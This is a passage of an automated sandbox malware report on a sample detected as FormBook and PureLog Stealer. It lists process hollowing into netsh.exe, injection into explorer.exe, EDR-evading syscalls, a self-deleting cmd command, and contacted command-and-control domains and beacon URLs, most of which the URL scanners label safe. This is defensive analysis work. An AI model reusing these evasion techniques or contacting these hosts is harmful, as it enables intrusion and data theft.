                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150A5B mov eax, dword ptr fs:[00000030h]6_2_01150A5B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150A5B mov eax, dword ptr fs:[00000030h]6_2_01150A5B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BCA72 mov eax, dword ptr fs:[00000030h]6_2_011BCA72
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BCA72 mov eax, dword ptr fs:[00000030h]6_2_011BCA72
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117CA6F mov eax, dword ptr fs:[00000030h]6_2_0117CA6F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117CA6F mov eax, dword ptr fs:[00000030h]6_2_0117CA6F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117CA6F mov eax, dword ptr fs:[00000030h]6_2_0117CA6F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EEA60 mov eax, dword ptr fs:[00000030h]6_2_011EEA60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178A90 mov edx, dword ptr fs:[00000030h]6_2_01178A90
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h]6_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214A80 mov eax, dword ptr fs:[00000030h]6_2_01214A80
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01083A08 _wcsicmp,_wcsicmp,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,_wcsupr,GetProcessHeap,HeapFree,8_2_01083A08
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01089930 SetUnhandledExceptionFilter,8_2_01089930
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_010896E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_010896E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.226 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 162.244.93.3 80Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeNtClose: Indirect: 0xB0A56C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeNtQueueApcThread: Indirect: 0xB0A4F2Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory written: C:\Users\user\Desktop\hOe2JrpIAE.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread register set: target process: 1028Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 1028Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                Sample uses process hollowing technique
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1080000Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: explorer.exe, 00000007.00000003.3099099836.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2008880814.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000007.00000000.2007072938.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Users\user\Desktop\hOe2JrpIAE.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01089B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_01089B55
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_010892E8 memset,GetVersionExW,8_2_010892E8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.3f99970.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.7140000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.5b50000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.340bcdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.33e7f58.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.340acc4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.3f99970.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.7140000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.5b50000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.340bcdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.33e7f58.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.hOe2JrpIAE.exe.340acc4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Shared Modules                		1
                DLL Side-Loading                		612
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory231
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                Process Injection                		NTDS41
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials214
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466892 Sample: hOe2JrpIAE.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 37 yipicircle.life 2->37 39 www.yipicircle.life 2->39 41 18 other IPs or domains 2->41 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 10 other signatures 2->55 11 hOe2JrpIAE.exe 3 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\hOe2JrpIAE.exe.log, ASCII 11->35 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 65 Switches to a custom stack to bypass stack traces 11->65 15 hOe2JrpIAE.exe 11->15         started        18 hOe2JrpIAE.exe 11->18         started        20 hOe2JrpIAE.exe 11->20         started        22 hOe2JrpIAE.exe 11->22         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 15->75 77 Maps a DLL or memory area into another process 15->77 79 Sample uses process hollowing technique 15->79 81 2 other signatures 15->81 24 explorer.exe 79 1 15->24 injected process9 dnsIp10 43 www.tiensbangladesh.net 162.244.93.3, 49719, 80 PONYNETUS United States 24->43 45 www.shopusuniform.com 199.59.243.226, 49720, 80 BODIS-NJUS United States 24->45 47 3 other IPs or domains 24->47 57 System process connects to network (likely due to code injection or exploit) 24->57 59 Uses netsh to modify the Windows network and firewall settings 24->59 28 netsh.exe 24->28         started        signatures11 process12 signatures13 67 Modifies the context of a thread in another process (thread injection) 28->67 69 Maps a DLL or memory area into another process 28->69 71 Tries to detect virtualization through RDTSC time measurements 28->71 73 Switches to a custom stack to bypass stack traces 28->73 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                hOe2JrpIAE.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                hOe2JrpIAE.exe100%AviraTR/AD.Swotter.gcxmc
                hOe2JrpIAE.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://excel.office.com0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                http://www.xztyvk.xyz0%Avira URL Cloudsafe
                https://word.office.comon0%Avira URL Cloudsafe
                http://www.yipicircle.life0%Avira URL Cloudsafe
                http://www.scientificmetalscorp.co0%Avira URL Cloudsafe
                http://www.j0mui3.shopReferer:0%Avira URL Cloudsafe
                http://www.dehamobilya.com/cn26/0%Avira URL Cloudsafe
                http://www.sswpdx.com/cn26/www.scientificmetalscorp.co0%Avira URL Cloudsafe
                http://www.tempotrekstore.com/cn26/www.xztyvk.xyz0%Avira URL Cloudsafe
                http://www.e2olyiab.shop0%Avira URL Cloudsafe
                https://android.notify.windows.com/iOS0%URL Reputationsafe
                http://www.cgffwelcome.com0%Avira URL Cloudsafe
                https://api.msn.com/0%URL Reputationsafe
                http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                http://www.foton.africa/cn26/www.e2olyiab.shop0%Avira URL Cloudsafe
                https://powerpoint.office.comcember0%Avira URL Cloudsafe
                http://www.e2olyiab.shop/cn26/0%Avira URL Cloudsafe
                http://www.tiensbangladesh.net0%Avira URL Cloudsafe
                http://www.tiensbangladesh.net/cn26/0%Avira URL Cloudsafe
                http://www.j0mui3.shop/cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb0%Avira URL Cloudsafe
                http://www.scientificmetalscorp.co/cn26/www.ajtsistemas.com0%Avira URL Cloudsafe
                http://www.sswpdx.com/cn26/0%Avira URL Cloudsafe
                http://www.theburnscleanteam.comReferer:0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://www.autoitscript.A0%Avira URL Cloudsafe
                http://www.happyjumps.co/cn26/0%Avira URL Cloudsafe
                http://www.autoitscript.B0%Avira URL Cloudsafe
                http://www.e2olyiab.shopReferer:0%Avira URL Cloudsafe
                http://www.shopusuniform.com/cn26/0%Avira URL Cloudsafe
                http://www.scientificmetalscorp.coReferer:0%Avira URL Cloudsafe
                http://www.shopusuniform.com/cn26/www.j0mui3.shop0%Avira URL Cloudsafe
                http://www.shopusuniform.comReferer:0%Avira URL Cloudsafe
                http://www.theburnscleanteam.com0%Avira URL Cloudsafe
                http://www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb0%Avira URL Cloudsafe
                http://www.tires-book-robust.bond/cn26/www.foton.africa100%Avira URL Cloudmalware
                http://www.foton.africa/cn26/0%Avira URL Cloudsafe
                http://www.e2olyiab.shop/cn26/www.yipicircle.life0%Avira URL Cloudsafe
                http://www.dehamobilya.com0%Avira URL Cloudsafe
                http://www.autoitscript.0%Avira URL Cloudsafe
                http://www.ajtsistemas.com/cn26/0%Avira URL Cloudsafe
                http://www.tempotrekstore.comReferer:0%Avira URL Cloudsafe
                http://www.ajtsistemas.comReferer:0%Avira URL Cloudsafe
                http://www.happyjumps.co0%Avira URL Cloudsafe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
                http://www.foton.africa0%Avira URL Cloudsafe
                http://www.scientificmetalscorp.co/cn26/0%Avira URL Cloudsafe
                http://www.tires-book-robust.bond0%Avira URL Cloudsafe
                http://www.happyjumps.coReferer:0%Avira URL Cloudsafe
                https://wns.windows.com/)s0%Avira URL Cloudsafe
                http://www.tiensbangladesh.net/cn26/www.shopusuniform.com0%Avira URL Cloudsafe
                http://www.j0mui3.shop/cn26/0%Avira URL Cloudsafe
                http://www.yipicircle.life/cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb0%Avira URL Cloudsafe
                http://www.tires-book-robust.bond/cn26/100%Avira URL Cloudmalware
                http://www.theburnscleanteam.com/cn26/0%Avira URL Cloudsafe
                http://www.dehamobilya.comReferer:0%Avira URL Cloudsafe
                http://www.j0mui3.shop0%Avira URL Cloudsafe
                http://www.happyjumps.co/cn26/www.tires-book-robust.bond0%Avira URL Cloudsafe
                http://www.happyjumps.co/cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb0%Avira URL Cloudsafe
                http://www.tires-book-robust.bondReferer:0%Avira URL Cloudsafe
                www.tires-book-robust.bond/cn26/100%Avira URL Cloudmalware
                http://www.dehamobilya.com/cn26/www.happyjumps.co0%Avira URL Cloudsafe
                http://www.cgffwelcome.com/cn26/www.dehamobilya.com0%Avira URL Cloudsafe
                http://www.j0mui3.shop/cn26/www.cgffwelcome.com0%Avira URL Cloudsafe
                http://www.sswpdx.com0%Avira URL Cloudsafe
                http://www.foton.africaReferer:0%Avira URL Cloudsafe
                https://outlook.com0%Avira URL Cloudsafe
                http://www.cgffwelcome.com/cn26/0%Avira URL Cloudsafe
                http://www.tempotrekstore.com0%Avira URL Cloudsafe
                http://www.yipicircle.life/cn26/www.tempotrekstore.com0%Avira URL Cloudsafe
                http://www.yipicircle.lifeReferer:0%Avira URL Cloudsafe
                http://www.tiensbangladesh.netReferer:0%Avira URL Cloudsafe
                http://www.shopusuniform.com0%Avira URL Cloudsafe
                http://www.theburnscleanteam.com/cn26/www.tiensbangladesh.net0%Avira URL Cloudsafe
                http://www.cgffwelcome.comReferer:0%Avira URL Cloudsafe
                http://www.sswpdx.comReferer:0%Avira URL Cloudsafe
                http://www.xztyvk.xyzReferer:0%Avira URL Cloudsafe
                http://www.yipicircle.life/cn26/0%Avira URL Cloudsafe
                http://www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb0%Avira URL Cloudsafe
                http://crl.v0%Avira URL Cloudsafe
                http://www.ajtsistemas.com0%Avira URL Cloudsafe
                http://www.xztyvk.xyz/cn26/0%Avira URL Cloudsafe
                http://www.xztyvk.xyz/cn26/www.sswpdx.com0%Avira URL Cloudsafe
                http://www.tiensbangladesh.net/cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb0%Avira URL Cloudsafe
                http://www.tempotrekstore.com/cn26/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                yipicircle.life
                		3.33.130.190
                		truetrue
                  		unknown
                  happyjumps.co
                  		3.33.130.190
                  		truetrue
                    		unknown
                    pa94nj5r.vakcloud.com
                    		14.128.41.165
                    		truetrue
                      		unknown
                      www.shopusuniform.com
                      		199.59.243.226
                      		truetrue
                        		unknown
                        www.foton.africa
                        		52.60.87.163
                        		truetrue
                          		unknown
                          td-ccm-neg-87-45.wixdns.net
                          		34.149.87.45
                          		truetrue
                            		unknown
                            www.tiensbangladesh.net
                            		162.244.93.3
                            		truetrue
                              		unknown
                              googleyou.qqdns.shop
                              		34.92.194.225
                              		truetrue
                                		unknown
                                www.tempotrekstore.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.dehamobilya.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.yipicircle.life
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.tires-book-robust.bond
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.j0mui3.shop
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.happyjumps.co
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.cgffwelcome.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.e2olyiab.shop
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.theburnscleanteam.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.j0mui3.shop/cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
